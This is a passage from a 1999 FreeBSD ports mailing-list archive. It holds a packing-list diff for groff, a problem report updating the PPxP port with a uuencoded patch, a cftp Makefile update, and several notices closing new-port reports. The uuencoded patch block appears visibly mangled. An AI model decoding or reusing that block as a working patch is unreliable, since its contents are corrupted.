-man/man7/groff_ms.7.gz -man/man7/me.7.gz -man/man7/msafer.7.gz -man/man1/afmtodit.1.gz -man/man1/grog.1.gz -man/man1/gnroff.1.gz -man/man7/groff_mm.7.gz -man/man7/groff_mmse.7.gz +bin/tfmtodit share/groff/eign -share/groff/tmac/hyphen.us -share/groff/tmac/hyphen.us-ru -share/groff/tmac/tmac.an -share/groff/tmac/tmac.andoc -share/groff/tmac/tmac.groff_an -share/groff/tmac/tmac.orig_me -share/groff/tmac/tmac.vgrind -share/groff/tmac/tmac.pic -share/groff/tmac/tmac.ps -share/groff/tmac/tmac.psnew -share/groff/tmac/tmac.psold -share/groff/tmac/tmac.pspic -share/groff/tmac/tmac.psatk -share/groff/tmac/tmac.dvi -share/groff/tmac/tmac.tty -share/groff/tmac/tmac.tty-char -share/groff/tmac/tmac.X -share/groff/tmac/tmac.Xps -share/groff/tmac/tmac.latin1 -share/groff/tmac/tmac.lj4 -share/groff/tmac/eqnrc -share/groff/tmac/eqnrc.orig -share/groff/tmac/troffrc -share/groff/tmac/troffrc.orig -share/groff/tmac/tmac.s -share/groff/tmac/tmac.safer -share/groff/tmac/tmac.e -share/groff/tmac/tmac.doc -share/groff/tmac/tmac.doc.old -share/groff/tmac/man.local -share/groff/tmac/tmac.m -share/groff/tmac/tmac.mse -share/groff/tmac/mdoc/doc-common -share/groff/tmac/mdoc/doc-ditroff -share/groff/tmac/mdoc/doc-nroff -share/groff/tmac/mdoc/doc-syms -@dirrm share/groff/tmac/mdoc -share/groff/tmac/mm/0.MT -share/groff/tmac/mm/5.MT -share/groff/tmac/mm/4.MT -share/groff/tmac/mm/ms.cov -share/groff/tmac/mm/se_ms.cov -share/groff/tmac/mm/locale -share/groff/tmac/mm/se_locale -@dirrm share/groff/tmac/mm -@dirrm share/groff/tmac -share/groff/font/devnippon/R -share/groff/font/devnippon/I -share/groff/font/devnippon/B -share/groff/font/devnippon/BI -share/groff/font/devnippon/M -share/groff/font/devnippon/G -share/groff/font/devnippon/DESC -@dirrm share/groff/font/devnippon -share/groff/font/devps/generate/Makefile -share/groff/font/devps/generate/afmname -share/groff/font/devps/generate/dingbatsmap -share/groff/font/devps/generate/dingbatsrmap -share/groff/font/devps/generate/lgreekmap -share/groff/font/devps/generate/symbol.sed -share/groff/font/devps/generate/symbolchars -share/groff/font/devps/generate/symbolsl.afm -share/groff/font/devps/generate/textmap -@dirrm share/groff/font/devps/generate -share/groff/font/devps/DESC -share/groff/font/devps/prologue -share/groff/font/devps/symbolsl.pfa -share/groff/font/devps/zapfdr.pfa -share/groff/font/devps/text.enc -share/groff/font/devps/download -share/groff/font/devps/S -share/groff/font/devps/ZD -share/groff/font/devps/ZDR -share/groff/font/devps/SS -share/groff/font/devps/AB -share/groff/font/devps/ABI -share/groff/font/devps/AI -share/groff/font/devps/AR -share/groff/font/devps/BMB -share/groff/font/devps/BMBI -share/groff/font/devps/BMI -share/groff/font/devps/BMR -share/groff/font/devps/CB -share/groff/font/devps/CBI -share/groff/font/devps/CI -share/groff/font/devps/CR -share/groff/font/devps/HB -share/groff/font/devps/HBI -share/groff/font/devps/HI -share/groff/font/devps/HR -share/groff/font/devps/HNB -share/groff/font/devps/HNBI -share/groff/font/devps/HNI -share/groff/font/devps/HNR -share/groff/font/devps/NB -share/groff/font/devps/NBI -share/groff/font/devps/NI -share/groff/font/devps/NR -share/groff/font/devps/PB -share/groff/font/devps/PBI -share/groff/font/devps/PI -share/groff/font/devps/PR -share/groff/font/devps/TB -share/groff/font/devps/TBI -share/groff/font/devps/TI -share/groff/font/devps/TR -share/groff/font/devps/ZCMI -share/groff/font/devps/M -share/groff/font/devps/G -@dirrm share/groff/font/devps +share/groff/font/devascii/B +share/groff/font/devascii/BI +share/groff/font/devascii/DESC +share/groff/font/devascii/I +share/groff/font/devascii/R share/groff/font/devdvi/generate/CompileFonts share/groff/font/devdvi/generate/Makefile share/groff/font/devdvi/generate/msam.map @@ -173,40 +38,30 @@ share/groff/font/devdvi/generate/texr.map share/groff/font/devdvi/generate/texsy.map share/groff/font/devdvi/generate/textt.map -@dirrm share/groff/font/devdvi/generate -share/groff/font/devdvi/DESC -share/groff/font/devdvi/R -share/groff/font/devdvi/I share/groff/font/devdvi/B share/groff/font/devdvi/BI share/groff/font/devdvi/CW -share/groff/font/devdvi/MI -share/groff/font/devdvi/S +share/groff/font/devdvi/DESC share/groff/font/devdvi/EX +share/groff/font/devdvi/G share/groff/font/devdvi/H -share/groff/font/devdvi/HI share/groff/font/devdvi/HB +share/groff/font/devdvi/HI +share/groff/font/devdvi/I +share/groff/font/devdvi/M +share/groff/font/devdvi/MI +share/groff/font/devdvi/R +share/groff/font/devdvi/S share/groff/font/devdvi/SA share/groff/font/devdvi/SB -share/groff/font/devdvi/M -share/groff/font/devdvi/G -@dirrm share/groff/font/devdvi -share/groff/font/devascii/R -share/groff/font/devascii/I -share/groff/font/devascii/B -share/groff/font/devascii/BI -share/groff/font/devascii/DESC -@dirrm share/groff/font/devascii -share/groff/font/devlatin1/R -share/groff/font/devlatin1/I share/groff/font/devlatin1/B share/groff/font/devlatin1/BI share/groff/font/devlatin1/DESC -@dirrm share/groff/font/devlatin1 +share/groff/font/devlatin1/I +share/groff/font/devlatin1/R share/groff/font/devlj4/generate/Makefile share/groff/font/devlj4/generate/special.map share/groff/font/devlj4/generate/text.map -@dirrm share/groff/font/devlj4/generate share/groff/font/devlj4/ALBB share/groff/font/devlj4/ALBR share/groff/font/devlj4/AOB @@ -244,90 +99,205 @@ share/groff/font/devlj4/UCR share/groff/font/devlj4/UI share/groff/font/devlj4/UR -@dirrm share/groff/font/devlj4 -share/groff/font/devX75/DESC -share/groff/font/devX75/TR -share/groff/font/devX75/TI -share/groff/font/devX75/TB -share/groff/font/devX75/TBI -share/groff/font/devX75/CR -share/groff/font/devX75/CI -share/groff/font/devX75/CB -share/groff/font/devX75/CBI -share/groff/font/devX75/HR -share/groff/font/devX75/HI -share/groff/font/devX75/HB -share/groff/font/devX75/HBI -share/groff/font/devX75/NR -share/groff/font/devX75/NI -share/groff/font/devX75/NB -share/groff/font/devX75/NBI -share/groff/font/devX75/S -share/groff/font/devX75/M -share/groff/font/devX75/G -@dirrm share/groff/font/devX75 -share/groff/font/devX75-12/DESC -share/groff/font/devX75-12/TR -share/groff/font/devX75-12/TI -share/groff/font/devX75-12/TB -share/groff/font/devX75-12/TBI -share/groff/font/devX75-12/CR -share/groff/font/devX75-12/CI -share/groff/font/devX75-12/CB -share/groff/font/devX75-12/CBI -share/groff/font/devX75-12/HR -share/groff/font/devX75-12/HI -share/groff/font/devX75-12/HB -share/groff/font/devX75-12/HBI -share/groff/font/devX75-12/NR -share/groff/font/devX75-12/NI -share/groff/font/devX75-12/NB -share/groff/font/devX75-12/NBI -share/groff/font/devX75-12/S -share/groff/font/devX75-12/M -share/groff/font/devX75-12/G -@dirrm share/groff/font/devX75-12 -share/groff/font/devX100/DESC -share/groff/font/devX100/TR -share/groff/font/devX100/TI -share/groff/font/devX100/TB -share/groff/font/devX100/TBI -share/groff/font/devX100/CR -share/groff/font/devX100/CI -share/groff/font/devX100/CB -share/groff/font/devX100/CBI -share/groff/font/devX100/HR -share/groff/font/devX100/HI -share/groff/font/devX100/HB -share/groff/font/devX100/HBI -share/groff/font/devX100/NR -share/groff/font/devX100/NI -share/groff/font/devX100/NB -share/groff/font/devX100/NBI -share/groff/font/devX100/S -share/groff/font/devX100/M -share/groff/font/devX100/G -@dirrm share/groff/font/devX100 -share/groff/font/devX100-12/DESC -share/groff/font/devX100-12/TR -share/groff/font/devX100-12/TI -share/groff/font/devX100-12/TB -share/groff/font/devX100-12/TBI -share/groff/font/devX100-12/CR -share/groff/font/devX100-12/CI +share/groff/font/devnippon/B +share/groff/font/devnippon/BI +share/groff/font/devnippon/DESC +share/groff/font/devnippon/G +share/groff/font/devnippon/I +share/groff/font/devnippon/M +share/groff/font/devnippon/R +share/groff/font/devps/generate/Makefile +share/groff/font/devps/generate/afmname +share/groff/font/devps/generate/dingbatsmap +share/groff/font/devps/generate/dingbatsrmap +share/groff/font/devps/generate/lgreekmap +share/groff/font/devps/generate/symbol.sed +share/groff/font/devps/generate/symbolchars +share/groff/font/devps/generate/symbolsl.afm +share/groff/font/devps/generate/textmap +share/groff/font/devps/AB +share/groff/font/devps/ABI +share/groff/font/devps/AI +share/groff/font/devps/AR +share/groff/font/devps/BMB +share/groff/font/devps/BMBI +share/groff/font/devps/BMI +share/groff/font/devps/BMR +share/groff/font/devps/CB +share/groff/font/devps/CBI +share/groff/font/devps/CI +share/groff/font/devps/CR +share/groff/font/devps/DESC +share/groff/font/devps/G +share/groff/font/devps/HB +share/groff/font/devps/HBI +share/groff/font/devps/HI +share/groff/font/devps/HNB +share/groff/font/devps/HNBI +share/groff/font/devps/HNI +share/groff/font/devps/HNR +share/groff/font/devps/HR +share/groff/font/devps/M +share/groff/font/devps/NB +share/groff/font/devps/NBI +share/groff/font/devps/NI +share/groff/font/devps/NR +share/groff/font/devps/PB +share/groff/font/devps/PBI +share/groff/font/devps/PI +share/groff/font/devps/PR +share/groff/font/devps/S +share/groff/font/devps/SS +share/groff/font/devps/TB +share/groff/font/devps/TBI +share/groff/font/devps/TI +share/groff/font/devps/TR +share/groff/font/devps/ZCMI +share/groff/font/devps/ZD +share/groff/font/devps/ZDR +share/groff/font/devps/download +share/groff/font/devps/prologue +share/groff/font/devps/symbolsl.pfa +share/groff/font/devps/text.enc +share/groff/font/devps/zapfdr.pfa share/groff/font/devX100-12/CB share/groff/font/devX100-12/CBI -share/groff/font/devX100-12/HR -share/groff/font/devX100-12/HI +share/groff/font/devX100-12/CI +share/groff/font/devX100-12/CR +share/groff/font/devX100-12/DESC +share/groff/font/devX100-12/G share/groff/font/devX100-12/HB share/groff/font/devX100-12/HBI -share/groff/font/devX100-12/NR -share/groff/font/devX100-12/NI +share/groff/font/devX100-12/HI +share/groff/font/devX100-12/HR +share/groff/font/devX100-12/M share/groff/font/devX100-12/NB share/groff/font/devX100-12/NBI +share/groff/font/devX100-12/NI +share/groff/font/devX100-12/NR share/groff/font/devX100-12/S -share/groff/font/devX100-12/M -share/groff/font/devX100-12/G +share/groff/font/devX100-12/TB +share/groff/font/devX100-12/TBI +share/groff/font/devX100-12/TI +share/groff/font/devX100-12/TR +share/groff/font/devX100/CB +share/groff/font/devX100/CBI +share/groff/font/devX100/CI +share/groff/font/devX100/CR +share/groff/font/devX100/DESC +share/groff/font/devX100/G +share/groff/font/devX100/HB +share/groff/font/devX100/HBI +share/groff/font/devX100/HI +share/groff/font/devX100/HR +share/groff/font/devX100/M +share/groff/font/devX100/NB +share/groff/font/devX100/NBI +share/groff/font/devX100/NI +share/groff/font/devX100/NR +share/groff/font/devX100/S +share/groff/font/devX100/TB +share/groff/font/devX100/TBI +share/groff/font/devX100/TI +share/groff/font/devX100/TR +share/groff/font/devX75-12/CB +share/groff/font/devX75-12/CBI +share/groff/font/devX75-12/CI +share/groff/font/devX75-12/CR +share/groff/font/devX75-12/DESC +share/groff/font/devX75-12/G +share/groff/font/devX75-12/HB +share/groff/font/devX75-12/HBI +share/groff/font/devX75-12/HI +share/groff/font/devX75-12/HR +share/groff/font/devX75-12/M +share/groff/font/devX75-12/NB +share/groff/font/devX75-12/NBI +share/groff/font/devX75-12/NI +share/groff/font/devX75-12/NR +share/groff/font/devX75-12/S +share/groff/font/devX75-12/TB +share/groff/font/devX75-12/TBI +share/groff/font/devX75-12/TI +share/groff/font/devX75-12/TR +share/groff/font/devX75/CB +share/groff/font/devX75/CBI +share/groff/font/devX75/CI +share/groff/font/devX75/CR +share/groff/font/devX75/DESC +share/groff/font/devX75/G +share/groff/font/devX75/HB +share/groff/font/devX75/HBI +share/groff/font/devX75/HI +share/groff/font/devX75/HR +share/groff/font/devX75/M +share/groff/font/devX75/NB +share/groff/font/devX75/NBI +share/groff/font/devX75/NI +share/groff/font/devX75/NR +share/groff/font/devX75/S +share/groff/font/devX75/TB +share/groff/font/devX75/TBI +share/groff/font/devX75/TI +share/groff/font/devX75/TR +share/groff/tmac/mdoc/doc-common +share/groff/tmac/mdoc/doc-ditroff +share/groff/tmac/mdoc/doc-nroff +share/groff/tmac/mdoc/doc-syms +share/groff/tmac/mm/0.MT +share/groff/tmac/mm/4.MT +share/groff/tmac/mm/5.MT +share/groff/tmac/mm/locale +share/groff/tmac/mm/ms.cov +share/groff/tmac/mm/se_locale +share/groff/tmac/mm/se_ms.cov +share/groff/tmac/eqnrc +share/groff/tmac/eqnrc.orig +share/groff/tmac/hyphen.us +share/groff/tmac/hyphen.us-ru +share/groff/tmac/man.local +share/groff/tmac/tmac.X +share/groff/tmac/tmac.Xps +share/groff/tmac/tmac.an +share/groff/tmac/tmac.andoc +share/groff/tmac/tmac.doc +share/groff/tmac/tmac.doc.old +share/groff/tmac/tmac.dvi +share/groff/tmac/tmac.e +share/groff/tmac/tmac.groff_an +share/groff/tmac/tmac.latin1 +share/groff/tmac/tmac.lj4 +share/groff/tmac/tmac.m +share/groff/tmac/tmac.mse +share/groff/tmac/tmac.orig_me +share/groff/tmac/tmac.pic +share/groff/tmac/tmac.ps +share/groff/tmac/tmac.psatk +share/groff/tmac/tmac.psnew +share/groff/tmac/tmac.psold +share/groff/tmac/tmac.pspic +share/groff/tmac/tmac.s +share/groff/tmac/tmac.safer +share/groff/tmac/tmac.tty +share/groff/tmac/tmac.tty-char +share/groff/tmac/tmac.vgrind +share/groff/tmac/troffrc +share/groff/tmac/troffrc.orig +@dirrm share/groff/font/devascii +@dirrm share/groff/font/devdvi/generate +@dirrm share/groff/font/devdvi +@dirrm share/groff/font/devlatin1 +@dirrm share/groff/font/devlj4/generate +@dirrm share/groff/font/devlj4 +@dirrm share/groff/font/devnippon +@dirrm share/groff/font/devps/generate +@dirrm share/groff/font/devps @dirrm share/groff/font/devX100-12 +@dirrm share/groff/font/devX100 +@dirrm share/groff/font/devX75-12 +@dirrm share/groff/font/devX75 @dirrm share/groff/font +@dirrm share/groff/tmac/mdoc +@dirrm share/groff/tmac/mm +@dirrm share/groff/tmac @dirrm share/groff >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 5:50: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F0B4014E4B for ; Sat, 25 Dec 1999 05:50:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA45821; Sat, 25 Dec 1999 05:50:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 54D3414FA7; Sat, 25 Dec 1999 05:40:55 -0800 (PST) Message-Id: <19991225134055.54D3414FA7@hub.freebsd.org> Date: Sat, 25 Dec 1999 05:40:55 -0800 (PST) From: nosuzuki@e-mail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15683: update PPxP port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15683 >Category: ports >Synopsis: update PPxP port >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 05:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Norio Suzuki >Release: 3.2-RELEASE >Organization: >Environment: FreeBSD ReRun.peanuts.li 3.2-RELEASE FreeBSD 3.2-RELEASE #3: Fri Jul 23 16:24:50 JST 1999 nosuzuki@ReRun.peanuts.li:/usr/src/sys/compile/RERUN i386 >Description: I made ppxp port updateing patch. This patch update from ppxp-0.99072807 to ppxp-0.99120923. This patch file include some patches to the documents written in Japanese and I send you with uuencoded format. This file also include a patch to use ppxp with Piafs 2.x protocol. >How-To-Repeat: >Fix: begin 644 ppxp-0.99120923.patch M9&EF9B`M'`N;VQD+TUA:V5F:6QE('!P>'`O36%K969I;&4*+2TM M('!P>'`N;VQD+TUA:V5F:6QE"5-A="!$96,@,C4@,#`Z,CDZ,C,@,3DY.0HK M*RL@<'!X<"]-86ME9FEL90E3870@1&5C(#(U(#`P.C,S.C,P(#$Y.3D*0$`@ M+3$L-B`K,2PV($!`"B`C($YE=R!P;W)T'`@)`H@(PH@"BU$25-43D%-13T)<'!X<"TP+CDY,#'`N;VQD+V9I;&5S+VUD-0E3870@1&5C(#(U(#`P.C(Y.C(S(#$Y M.3D**RLK('!P>'`O9FEL97,O;60U"5-A="!$96,@,C4@,#`Z,S,Z-34@,3DY M.0I`0"`M,2`K,2!`0`HM340U("AP<'AP+3`N.3DP-S(X,#'`M M,"XY.3$R,#DR,RYT87(N9WHI(#T@,6)F-#1D-F-A,C1A,F5D.3$R9#9C93`X M8F8V-3=A,V0*9&EF9B`M'`N;VQD+W!A=&-H97,O<&%T8V@M86$@ M<'!X<"]P871C:&5S+W!A=&-H+6%A"BTM+2!P<'AP+F]L9"]P871C:&5S+W!A M=&-H+6%A"51H=2!*86X@(#$@,#DZ,#`Z,#`@,3DW,`HK*RL@<'!X<"]P871C M:&5S+W!A=&-H+6%A"5-A="!$96,@,C4@,C(Z,3DZ,C,@,3DY.0I`0"`M,"PP M("LQ+#4W($!`"BMD:69F("UU7!E'`O8V]N'`O'`O2`D<&%G92YD:6%L16YT2!C;VYF:6=U'`N;F5W+V1O8R]J85]*4"]1=6EC:U5S86=E+G-G;6P**RTM+2!D;V,O:F%? M2E`O475I8VM5DWJ2YH:,**RL@(%1O;F4HI"FDJZ3IN]C$ZJ2WI-ZDN:&C"BL@ M"BL@/'1A9S[%Q<_#R-:YYCPO=&%G/@HK("`@P-S"L\#HI,[%Q<_#R-:YYJ3R MN]C$ZJ2WI-ZDN:&C,"#(K[^NI,[&XL#^R-:YYJ3.ONRYYZ&BP.C&K*3+H=8P M+*'7I/+)U;+#I+>DQJ2OI,"DM:2DH:,**V1I9F8@+75R('!P>'`O9&]C+VIA M7TI0+U%U:6-K57-A9V4N='AT('!P>'`N;F5W+V1O8R]J85]*4"]1=6EC:U5S M86=E+G1X=`HK+2TM(&1O8R]J85]*4"]1=6EC:U5S86=E+G1X=`E3=6X@2G5N M(#(W(#`R.C`V.C,W(#$Y.3D**RLK*R!D;V,O:F%?2E`O475I8VM5'0)4V%T($1E8R`R-2`P,#HQ,CHT-"`Q.3DY"BM`0"`M-CO*_;RP"BL@("`@("`@("!4;VYE**7(H;RE M\RFAHE!U;'-E**71I>NEN2FAHD1A=&$HI<>AO`HK+2`@("`@("`@I;\IH:)) MDWJ2YH:,**R`**R`@("`@(,7%S\/(UKGF"BL@ M("`@("`@("#`W,*SP.BDSL7%S\/(UKGFI/*[V,3JI+>DWJ2YH:,P(,BOOZZD MSL;BP/[(UKGFI,Z^[+GGH:+`Z,:LI,L**V1I9F8@+75R('!P>'`O971C+VUO M9&5M+VUC-C4S,"!P<'AP+FYE=R]E=&,O;6]D96TO;6,V-3,P"BLM+2T@971C M+VUO9&5M+VUC-C4S,`E7960@3F]V(#(U(#$P.C0S.C$V(#$Y.3@**RLK*R!E M=&,O;6]D96TO;6,V-3,P"5-A="!$96,@,C4@,#`Z,30Z-#D@,3DY.0HK0$`@ M+34L-"`K-2PU($!`"BL@1&%T841I86P)(D%41%QP(R,Q(@HK($ES9&Y$:6%L M"2)!5$1<<",C,B(**R!0:6%F'`O<&%T8VAE'`O<&%T8VAER`@("`@("`@("`@("`@("`@ 6("`@("`@("`@("`@("`@("`@("!]"D(^ ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 6:30:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6916715118 for ; Sat, 25 Dec 1999 06:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA48157; Sat, 25 Dec 1999 06:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from icc.surw.chel.su (surw.chel.su [195.54.2.162]) by hub.freebsd.org (Postfix) with ESMTP id 8738214DC3 for ; Sat, 25 Dec 1999 06:24:17 -0800 (PST) (envelope-from andy@icc.surw.chel.su) Received: (from andy@localhost) by icc.surw.chel.su (8.9.3/8.9.3) id RAA13478; Sat, 25 Dec 1999 17:24:09 +0300 (MSK) (envelope-from andy) Message-Id: <199912251424.RAA13478@icc.surw.chel.su> Date: Sat, 25 Dec 1999 17:24:09 +0300 (MSK) From: Andrey Zakhvatov Reply-To: andy@icc.surw.chel.su To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15684: Update port: ftp/cftp Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15684 >Category: ports >Synopsis: Update port: ftp/cftp >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 06:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrey Zakhvatov >Release: FreeBSD 3.3-RELEASE i386 >Organization: South Ural Railway ICC >Environment: >Description: This is a patch to update ftp/cftp port. diff -Nru cftp/Makefile cftp-0.9.3/Makefile --- cftp/Makefile Wed Aug 25 14:15:05 1999 +++ cftp-0.9.3/Makefile Sat Dec 25 17:21:14 1999 @@ -1,5 +1,5 @@ # New ports collection makefile for: cftp -# Version required: 0.9.1 +# Version required: 0.9.3 # Date created: 14 October 1997 # Whom: Andrey Zakhvatov # @@ -8,7 +8,8 @@ DISTNAME= cftp-0.9.3 CATEGORIES= ftp -MASTER_SITES= ftp://ftp.giga.or.at/pub/nih/cftp/ +MASTER_SITES= ftp://ftp.giga.or.at/pub/nih/cftp/ \ + http://www.FreeBSD.org/~andy/ MAINTAINER= andy@icc.surw.chel.su >How-To-Repeat: >Fix: Please, check and apply this patch. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7: 9:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B4CF14FB6; Sat, 25 Dec 1999 07:09:36 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA03681; Sat, 25 Dec 1999 07:09:35 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:09:35 -0800 (PST) From: Message-Id: <199912251509.HAA03681@freefall.freebsd.org> To: elwood@mc5sys.in-berlin.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15016: New Port: lang/yabasic Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New Port: lang/yabasic State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:09:03 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:33:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EB84A14F3B; Sat, 25 Dec 1999 07:33:55 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA05076; Sat, 25 Dec 1999 07:33:55 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:33:55 -0800 (PST) From: Message-Id: <199912251533.HAA05076@freefall.freebsd.org> To: jdunn@aquezada.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15152: new port cd-console Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: new port cd-console State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:30:40 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:35:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 97E681524A; Sat, 25 Dec 1999 07:35:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA05365; Sat, 25 Dec 1999 07:35:49 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:35:49 -0800 (PST) From: Message-Id: <199912251535.HAA05365@freefall.freebsd.org> To: kzentner@u.washington.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15180: New audio port submission: soundtracker Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New audio port submission: soundtracker State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:34:02 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:41: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D3B8D152F4; Sat, 25 Dec 1999 07:41:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA05868; Sat, 25 Dec 1999 07:40:55 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:40:55 -0800 (PST) From: Message-Id: <199912251540.HAA05868@freefall.freebsd.org> To: sa264@phy.cam.ac.uk, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15462: New port: cad/cider Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: cad/cider State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:36:24 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:43:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4E2FB152BE; Sat, 25 Dec 1999 07:43:52 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA06188; Sat, 25 Dec 1999 07:43:52 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:43:52 -0800 (PST) From: Message-Id: <199912251543.HAA06188@freefall.freebsd.org> To: dsh@neva.vlink.ru, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15203: New FreeBSD port: p5-Term-ANSIColor Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New FreeBSD port: p5-Term-ANSIColor State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:41:32 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:47:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6782F14D00; Sat, 25 Dec 1999 07:47:20 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA06687; Sat, 25 Dec 1999 07:47:20 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 07:47:20 -0800 (PST) From: Message-Id: <199912251547.HAA06687@freefall.freebsd.org> To: mkamm@gmx.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15031: New port: editors/auctex Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: editors/auctex State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 07:47:11 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 7:50:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 69957152BF; Sat, 25 Dec 1999 07:50:15 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA07011; Sat, 25 Dec 1999 